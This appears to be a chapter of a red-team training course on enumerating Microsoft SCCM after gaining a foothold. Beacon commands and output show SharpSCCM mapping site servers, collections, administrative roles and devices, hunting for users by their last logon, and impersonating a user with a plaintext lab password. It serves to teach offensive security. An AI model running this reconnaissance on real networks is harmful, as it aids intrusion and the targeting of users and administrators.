The first step when attacking SCCM is to get a feel for the deployment topology, which devices are being managed, and who the administrative users are. Throughout this chapter, we'll use the SharpSCCM tool. Given a foothold on a machine, we can begin by finding the management point and site code that it is linked to. This does not require any special privileges in the domain, in SCCM or on the endpoint.
beacon> run hostname
beacon> getuid
[*] You are DEV\bfarmer
beacon> execute-assembly C:\Tools\SharpSCCM\bin\Release\SharpSCCM.exe local site-info --no-banner
Name: SMS:S01
[+] Completed execution in 00:00:00.2733939
This enumeration uses WMI under the hood, which could be done manually.
We can also check the DACL on the CN=System Management container in AD for machines that have Full Control over it (as this a pre-requisite of SCCM setup in a domain).
beacon> execute-assembly C:\Tools\SharpSCCM\bin\Release\SharpSCCM.exe get site-info -d --no-banner
[!] Found 1 computer account(s) with GenericAll permission on the System Management container:
[+] These systems are likely to be ConfigMgr site servers
[+] Completed execution in 00:00:00.4974129
Enumerating users, groups, computers, collections, and administrators, etc, does require some level of privilege in SCCM and cannot be done as a standard domain user. SCCM employs an RBAC security model - the lowest role is "Read-Only Analyst" and the highest is "Full Administrator". Lots of other roles exist such as "Asset Manager", "Infrastructure Administrator", and "Software Update Manager". A description of each can be found here. Furthermore, the "scope" of these roles can be restricted to individual collections as needed by the administrative user. For example, computers from the DEV and CYBER domains have been grouped into their own collections.
This can really impact your view (as an attacker) of how SCCM is configured. For example, if we enumerate all the collections as bfarmer, we can see that both DEV and CYBER exist as well as their member counts.
beacon> getuid
[*] You are DEV\bfarmer
beacon> execute-assembly C:\Tools\SharpSCCM\bin\Release\SharpSCCM.exe get collections --no-banner
Name: DEV
MemberCount: 6
MemberCount: 4
[+] Completed execution in 00:00:00.6623964
However, if we run the same enumeration as jking, a member of DEV\Support Engineers, we only see the DEV collection.
beacon> make_token DEV\jking Qwerty123
[+] Impersonated DEV\jking (netonly)
beacon> execute-assembly C:\Tools\SharpSCCM\bin\Release\SharpSCCM.exe get collections --no-banner
Name: DEV
MemberCount: 6
[+] Completed execution in 00:00:02.7849452
This is because even though DEV\Developers are only "Read-Only Analysts", the role is scoped to both collections. DEV\Support Engineers are "Full Administrators" over the DEV collection but they have no roles that are scoped to the CYBER collection.
So when enumerating SCCM, you may only see a small slither based on the user you're running the enumeration as.
Administrative users can be found using get class-instances SMS_Admin.
beacon> execute-assembly C:\Tools\SharpSCCM\bin\Release\SharpSCCM.exe get class-instances SMS_Admin --no-banner
CategoryNames: All
CollectionNames: All Systems, All Users and User Groups
LogonName: SCM-1\Administrator
RoleNames: Full Administrator
CategoryNames: Default
CollectionNames: DEV, CYBER
LogonName: DEV\Developers
RoleNames: Read-only Analyst
CategoryNames: Default
CollectionNames: DEV
LogonName: DEV\Support Engineers
RoleNames: Full Administrator
CategoryNames: All
CollectionNames: All Systems, All Users and User Groups
LogonName: CYBER\Domain Admins
RoleNames: Full Administrator
[+] Completed execution in 00:00:06.0664364
This allows us to see what is reflected in the Configuration Manger GUI above. Members of these collections can be found using get collection-members -n <collection-name>.
beacon> execute-assembly C:\Tools\SharpSCCM\bin\Release\SharpSCCM.exe get collection-members -n DEV --no-banner
Domain: DEV
Name: WKSTN-2
Domain: DEV
Name: SQL-2
Domain: DEV
Name: WKSTN-1
Domain: DEV
Name: DC-2
Domain: DEV
Name: FS
Domain: DEV
Name: WEB
[+] Completed execution in 00:00:03.2562318
Even more information on each device can be obtained using get devices. There are some good ways to filter the output, such as searching by device name, -n, and only displaying the properties specified by -p.
beacon> execute-assembly C:\Tools\SharpSCCM\bin\Release\SharpSCCM.exe get devices -n WKSTN -p Name -p FullDomainName -p IPAddresses -p LastLogonUserName -p OperatingSystemNameandVersion --no-banner
LastLogonUserName: nlamb
Name: WKSTN-1
OperatingSystemNameandVersion: Microsoft Windows NT Workstation 10.0
LastLogonUserName: bfarmer
Name: WKSTN-2
OperatingSystemNameandVersion: Microsoft Windows NT Workstation 10.0
[+] Completed execution in 00:00:01.3059878
You can also use SCCM as a form of user hunting, since it records the last user to login to each managed computer. The -u parameter will only return devices where the given user was the last to login.
beacon> execute-assembly C:\Tools\SharpSCCM\bin\Release\SharpSCCM.exe get devices -u nlamb -p IPAddresses -p IPSubnets -p Name --no-banner
Name: WKSTN-1
[+] Completed execution in 00:00:01.7570393
However, take these results with a grain of salt because this information is only updated in SCCM every 7 days by default.